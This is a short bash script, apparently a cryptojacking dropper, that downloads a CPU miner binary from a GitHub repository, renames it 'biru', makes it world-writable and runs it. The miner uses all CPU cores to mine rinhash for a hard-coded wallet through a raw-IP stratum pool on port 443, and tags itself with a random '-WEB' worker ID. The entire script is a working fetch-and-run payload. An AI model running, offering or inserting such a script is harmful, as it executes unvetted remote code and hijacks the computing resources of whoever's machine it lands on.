#!/bin/bash
wget -O biru https://github.com/claires67/newxm/raw/main/cpuminer-avx2 
chmod 777 biru
./biru -a rinhash -o stratum+tcp://64.23.144.233:443 -u RKDaBdHAwcbkHwWpmq4ErfxmqgqM2zn2NF.$(shuf -n 1 -i 1-99999)-WEB -t $(nproc --all)
